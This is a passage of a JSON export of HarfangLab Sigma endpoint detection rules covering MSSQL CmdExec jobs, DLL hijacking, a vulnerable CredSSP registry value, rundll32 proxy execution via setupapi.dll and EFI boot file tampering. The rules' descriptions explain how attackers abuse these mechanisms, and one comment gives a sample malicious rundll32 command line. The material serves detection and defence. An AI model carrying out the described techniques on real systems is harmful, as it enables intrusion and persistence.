'?:\\WINDOWS\\syswow64\\conhost.exe'\n\n exclusion_werfault:\n Image:\n - '?:\\Windows\\System32\\WerFault.exe'\n - '?:\\Windows\\Syswow64\\WerFault.exe'\n\n exclusion_mssqltools:\n Image|endswith:\n - '\\Tools\\Binn\\\\*.exe'\n - '\\DTS\\Binn\\\\*.exe'\n - '\\COM\\\\*.exe'\n - '\\shared\\\\*.exe'\n - 'MSSQL\\\\Binn\\\\*.exe'\n - '?:\\Windows\\WID\\Binn\\SqlDumper.exe'\n ProcessSignature : 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n exclusion_powershell_script: # mainly administration scripts\n Image: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n CommandLine|endswith: '.ps1'\n\n exclusion_msft_tools:\n ProcessOriginalFileName: 'TriggerJob.exe'\n ProcessSignature : 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n exclusion_common_export_tools:\n - Image:\n - '?:\\Windows\\System32\\ftp.exe'\n - '?:\\Windows\\System32\\forfiles.exe'\n - Image|endswith: '\\psftp.exe'\n Company: 'Simon Tatham'\n - Image|endswith:\n - '\\WinSCP.com'\n - '\\WinSCP.exe'\n Company: 'Martin Prikryl'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cb61697d-e59e-4928-b4cc-0d866202a835",
"rule_name": "Execution of a Suspicious MSSQL CmdExec Job",
"rule_description": "Detects the execution of an MSSQL job using the CmdExec subsystem.\nAttackers may execute a CmdExec job in order to gain code execution on a machine hosting a compromised database engine.\nIt is recommended to check if this behavior is expected and check for malicious activities stemming from the newly created process.\n",
"rule_creation_date": "2024-07-23",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1059.003",
"attack.t1190",
"attack.t1505.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cb9fbc59-20a2-44fa-a29f-2478fa492249",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087313Z",
"creation_date": "2026-03-23T11:45:34.087315Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087320Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_microsoftedgecp.yml",
"content": "title: DLL Hijacking via microsoftedgecp.exe\nid: cb9fbc59-20a2-44fa-a29f-2478fa492249\ndescription: |\n Detects potential Windows DLL Hijacking via microsoftedgecp.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'microsoftedgecp.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\iertutil.dll'\n - '\\USERENV.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cb9fbc59-20a2-44fa-a29f-2478fa492249",
"rule_name": "DLL Hijacking via microsoftedgecp.exe",
"rule_description": "Detects potential Windows DLL Hijacking via microsoftedgecp.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cbdf5218-c8ec-48e6-b58f-9066c7358ec2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620898Z",
"creation_date": "2026-03-23T11:45:34.620900Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620905Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://support.microsoft.com/en-au/topic/credssp-updates-for-cve-2018-0886-5cbf9e5f-dc6d-744f-9e97-7ba400d6d3ea",
"https://github.com/preempt/credssp",
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1112_credssp_vuln_allowencryptionoracle.yml",
"content": "title: CredSSP's AllowEncryptionOracle Vulnerable Value Set via Registry\nid: cbdf5218-c8ec-48e6-b58f-9066c7358ec2\ndescription: |\n Detects when CredSSP's AllowEncryptionOracle configuration is changed to a vulnerable value.\n Adversaries may change AllowEncryptionOracle to the vulnerable value (2) in order to make the server vulnerable to remote code execution.\n It is recommended to investigate this action to determine its legitimacy and to investigate any suspicious authentications.\nreferences:\n - https://support.microsoft.com/en-au/topic/credssp-updates-for-cve-2018-0886-5cbf9e5f-dc6d-744f-9e97-7ba400d6d3ea\n - https://github.com/preempt/credssp\n - https://attack.mitre.org/techniques/T1112/\ndate: 2024/04/02\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\CredSSP\\Parameters\\AllowEncryptionOracle'\n Details: 'DWORD (0x00000002)'\n ProcessParentImage|contains: '?'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_siemens:\n ProcessImage: '?:\\Windows\\Temp\\TSplusInstaller\\Setup-Siemens.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'TSplus SAS'\n\n exclusion_sccm:\n ProcessParentCommandLine|startswith: '?:\\Windows\\System32\\cmd.exe /c ?:\\Windows\\ccmcache\\'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cbdf5218-c8ec-48e6-b58f-9066c7358ec2",
"rule_name": "CredSSP's AllowEncryptionOracle Vulnerable Value Set via Registry",
"rule_description": "Detects when CredSSP's AllowEncryptionOracle configuration is changed to a vulnerable value.\nAdversaries may change AllowEncryptionOracle to the vulnerable value (2) in order to make the server vulnerable to remote code execution.\nIt is recommended to investigate this action to determine its legitimacy and to investigate any suspicious authentications.\n",
"rule_creation_date": "2024-04-02",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cbe5f82c-82e6-4a59-abdd-f95838d021f6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.069323Z",
"creation_date": "2026-03-23T11:45:34.069325Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.069330Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Libraries/Setupapi/",
"https://attack.mitre.org/techniques/T1218/011/"
],
"name": "t1218_011_rundll32_setupapi.yml",
"content": "title: Proxy Execution via Setupapi.dll\nid: cbe5f82c-82e6-4a59-abdd-f95838d021f6\ndescription: |\n Detects a suspicious invocation of `setupapi.dll` by `rundll32.exe`.\n Adversaries may abuse `rundll32.exe` to proxy execution of malicious code. Using `rundll32.exe`, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the `rundll32.exe` process because of allowlists or false positives from normal operations.\n It is recommended to investigate the parent process for suspicious activities as well as other malicious actions stemming from the rundll32 process.\nreferences:\n - https://lolbas-project.github.io/lolbas/Libraries/Setupapi/\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2022/12/02\nmodified: 2025/05/12\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.011\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Setupapi\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\shady.inf\n selection_1:\n - Image|endswith: '\\rundll32.exe'\n - OriginalFileName: 'RUNDLL32.EXE'\n selection_2:\n CommandLine|contains|all:\n - ' setupapi'\n - 'DefaultInstall'\n selection_3:\n CommandLine|contains:\n - 'InstallHinfSection'\n - '#238' # InstallHinfSection\n - '#239' # InstallHinfSectionA\n - '#240' # InstallHinfSectionW\n\n exclusion_nvidia:\n CommandLine|endswith: '\\NVIDIA\\3DVision\\NVSTEREO.INF'\n\n exclusion_reasonlabs:\n CommandLine:\n - '?:\\WINDOWS\\system32\\rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 ?:\\Program Files\\ReasonLabs\\EPP\\x64\\rsKernelEngine.inf'\n - '?:\\WINDOWS\\system32\\rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 ?:\\Program Files\\ReasonLabs\\DNS\\rsDwf.inf'\n\n exclusion_msi1:\n CommandLine|contains: 'rundll32.exe SetupApi.dll,InstallHinfSection DefaultInstall ??? ?:\\Program Files\\\\*.inf'\n ParentImage:\n - '?:\\Windows\\System32\\msiexec.exe'\n - '?:\\Windows\\SysWOW64\\msiexec.exe'\n exclusion_msi2:\n CommandLine|contains: 'rundll32.exe SetupApi.dll,InstallHinfSection DefaultInstall ??? ?:\\Program Files\\\\*.inf'\n GrandparentImage:\n - '?:\\Windows\\System32\\msiexec.exe'\n - '?:\\Windows\\SysWOW64\\msiexec.exe'\n\n exclusion_images:\n - ParentImage:\n - '?:\\Program Files\\LatencyMon\\LatMon.exe'\n - '?:\\Program Files (x86)\\Security Eye\\xvid.exe'\n - '?:\\Program Files (x86)\\Fluoplate\\dcom95.exe'\n - '?:\\Program Files (x86)\\eGambit\\das\\dasc.exe'\n - '?:\\Program Files (x86)\\Perfect IP Camera Viewer\\xvid.exe'\n - '?:\\Program Files\\Sonix\\SNFilterDriver\\DriverInstall.exe'\n - GrandparentImage:\n - '?:\\Program Files (x86)\\Cato Networks\\Cato Client\\winvpnclient.cli.exe'\n - '?:\\Program Files\\Android\\Android Studio\\bin\\studio64.exe'\n\n exclusion_revo:\n CommandLine:\n - 'rundll32.exe SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 ?:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\revoflt.inf'\n - 'rundll32.exe SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 ?:\\Program Files\\VS Revo Group\\Revo Uninstaller\\RevoProcessDetector.inf'\n\n exclusion_idm:\n CommandLine: '?:\\WINDOWS\\Sysnative\\RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 128 ?:\\Program Files (x86)\\Internet Download Manager\\idmwfp.inf'\n\n exclusion_rsdk:\n CommandLine|contains:\n - 'rundll32.exe setupapi,InstallHinfSection DefaultInstall.nt 0 ?:\\WINDOWS\\TEMP\\RSDK_Setup\\RSDK-SpeexACM??.inf'\n - 'rundll32.exe setupapi,InstallHinfSection DefaultInstall.nt 0 ?:\\WINDOWS\\SystemTemp\\RSDK_Setup\\RSDK-SpeexACM??.inf'\n - 'rundll32.exe setupapi,InstallHinfSection DefaultInstall.nt 0 ?:\\Users\\\\*\\AppData\\Local\\Temp\\RSDK_Setup\\RSDK-SpeexACM??.inf'\n CurrentDirectory:\n - '?:\\WINDOWS\\TEMP\\RSDK_Setup\\'\n - '?:\\WINDOWS\\SystemTemp\\RSDK_Setup\\'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\RSDK_Setup\\'\n\n exclusion_wireshark:\n CommandLine: '?:\\WINDOWS\\system32\\RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 .\\USBPcap.inf'\n CurrentDirectory: '?:\\Program Files\\USBPcap\\'\n\n exclusion_ndi:\n CommandLine: '?:\\WINDOWS\\system32\\rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .\\Codec.SpeedHQ.x??.inf'\n CurrentDirectory: '?:\\Program Files\\NDI\\NDI ? Tools\\Codec\\'\n\n exclusion_configtool:\n CommandLine: 'RUNDLL32 SETUPAPI.DLL,InstallHinfSection DefaultInstall 128 ?:\\Users\\\\*\\AppData\\Local\\Temp\\TmpInf.inf'\n CurrentDirectory: '?:\\Program Files (x86)\\ConfigTool\\ConfigTool\\'\n\n exclusion_bridge:\n CommandLine: 'rundll32.exe setupapi,InstallHinfSection DefaultInstall 132 ?:\\Program Files (x86)\\Bridge Master 2000\\\\*.inf'\n\n exclusion_xvid:\n CommandLine: '?:\\Windows\\System32\\rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 0 ?:\\Users\\\\*\\AppData\\Local\\Temp/xvid_x??/xvid.inf'\n\n exclusion_android-studio:\n CommandLine: 'RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 .\\aehd.Inf'\n GrandparentImage|endswith: '\\bin\\studio64.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cbe5f82c-82e6-4a59-abdd-f95838d021f6",
"rule_name": "Proxy Execution via Setupapi.dll",
"rule_description": "Detects a suspicious invocation of `setupapi.dll` by `rundll32.exe`.\nAdversaries may abuse `rundll32.exe` to proxy execution of malicious code. Using `rundll32.exe`, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the `rundll32.exe` process because of allowlists or false positives from normal operations.\nIt is recommended to investigate the parent process for suspicious activities as well as other malicious actions stemming from the rundll32 process.\n",
"rule_creation_date": "2022-12-02",
"rule_modified_date": "2025-05-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cc33067b-47b1-40ff-b66f-60ab71a97745",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.592407Z",
"creation_date": "2026-03-23T11:45:34.592411Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.592418Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_vdsldr.yml",
"content": "title: DLL Hijacking via vdsldr.exe\nid: cc33067b-47b1-40ff-b66f-60ab71a97745\ndescription: |\n Detects potential Windows DLL Hijacking via vdsldr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'vdsldr.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ATL.DLL'\n - '\\bcd.dll'\n - '\\vdsutil.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cc33067b-47b1-40ff-b66f-60ab71a97745",
"rule_name": "DLL Hijacking via vdsldr.exe",
"rule_description": "Detects potential Windows DLL Hijacking via vdsldr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cc7bc0a7-a4e9-4f23-b8a4-772b7b15b6eb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071411Z",
"creation_date": "2026-03-23T11:45:34.071414Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071418Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://unit42.paloaltonetworks.com/glupteba-malware-uefi-bootkit/",
"https://attack.mitre.org/techniques/T1542/001/"
],
"name": "t1542_001_boot_efi_file_change.yml",
"content": "title: Suspicious EFI File Modification\nid: cc7bc0a7-a4e9-4f23-b8a4-772b7b15b6eb\ndescription: |\n Detects the suspicious renaming or writing of EFI boot-related files.\n Adversaries may tamper with the Windows EFI boot files in order to disable built-in security features at boot or for persistence purposes.\n It is recommended to analyze the behavior of the process responsible for the filesystem event.\nreferences:\n - https://unit42.paloaltonetworks.com/glupteba-malware-uefi-bootkit/\n - https://attack.mitre.org/techniques/T1542/001/\ndate: 2024/02/19\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.t1542.001\n - attack.t1014\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: filesystem_event\n product: windows\ndetection:\n selection_event:\n Kind:\n - 'write'\n - 'rename'\n selection_path:\n - Path:\n - 'A:\\EFI\\Microsoft\\Boot\\bootmgfw.efi'\n - 'B:\\EFI\\Microsoft\\Boot\\bootmgfw.efi'\n - 'A:\\EFI\\Boot\\bootx64.efi'\n - 'B:\\EFI\\Boot\\bootx64.efi'\n - TargetPath:\n - 'A:\\EFI\\Microsoft\\Boot\\bootmgfw.efi'\n - 'B:\\EFI\\Microsoft\\Boot\\bootmgfw.efi'\n - 'A:\\EFI\\Boot\\bootx64.efi'\n - 'B:\\EFI\\Boot\\bootx64.efi'\n\n exclusion_system:\n ProcessName: 'system'\n ProcessId: '4'\n\n exclusion_minint:\n - ProcessParentImage:\n - '?:\\MININT\\Tools\\X64\\TsmBootstrap.exe'\n - '?:\\MININT\\Tools\\X64\\TsManager.exe'\n - ProcessGrandparentImage:\n - '?:\\MININT\\Tools\\X64\\TsmBootstrap.exe'\n - '?:\\MININT\\Tools\\X64\\TsManager.exe'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n exclusion_rufus:\n ProcessName: 'rufus*.exe'\n ProcessDescription: 'Rufus'\n ProcessSignature : 'Akeo Consulting'\n ProcessSigned: 'true'\n\n exclusion_defender:\n ProcessImage:\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n - '?:\\Program Files\\Windows Defender\\MsMpEng.exe'\n ProcessSignature : 'Microsoft Windows Publisher'\n ProcessSigned: 'true'\n\n exclusion_createmedia:\n ProcessName: 'CreateMedia.exe'\n ProcessSignature : 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n exclusion_setuphost:\n ProcessName: 'SetupHost.exe'\n ProcessSignature : 'Microsoft Windows'\n ProcessSigned: 'true'\n\n exclusion_bcdboot:\n ProcessImage: '?:\\Windows\\System32\\bcdboot.exe'\n ProcessSignature : 'Microsoft Windows'\n ProcessSigned: 'true'\n\n exclusion_recoverydrive:\n Image: '?:\\Windows\\System32\\RecoveryDrive.exe'\n ProcessSignature : 'Microsoft Windows'\n ProcessSigned: 'true'\n\n exclusion_7z:\n ProcessCompany: 'Igor Pavlov'\n ProcessDescription:\n - '7-Zip Console'\n - '7-Zip GUI'\n - '7-Zip File Manager'\n\n exclusion_tiworker:\n Image: '?:\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_*\\TiWorker.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cc7bc0a7-a4e9-4f23-b8a4-772b7b15b6eb",
"rule_name": "Suspicious EFI File Modification",
"rule_description": "Detects the suspicious renaming or writing of EFI boot-related files.\nAdversaries may tamper with the Windows EFI boot files in order to disable built-in security features at boot or for persistence purposes.\nIt is recommended to analyze the behavior of the process responsible for the filesystem event.\n",
"rule_creation_date": "2024-02-19",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1014",
"attack.t1542.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cccb59b8-ff73-4c88-a42b-b858a14aea80",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296250Z",
"creation_date": "2026-03-23T11:45:35.296253Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296260Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://gist.github.com/D3Ext/bf57673644ba08e729f65892e0dae6c4#powershell-downgrade",
"https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell/tree/master?tab=readme-ov-file#Using-PowerShell-version-2",
"https://attack.mitre.org/techniques/T1562/010/"
],
"name": "t1562_010_powershell_version_downgrade.yml",
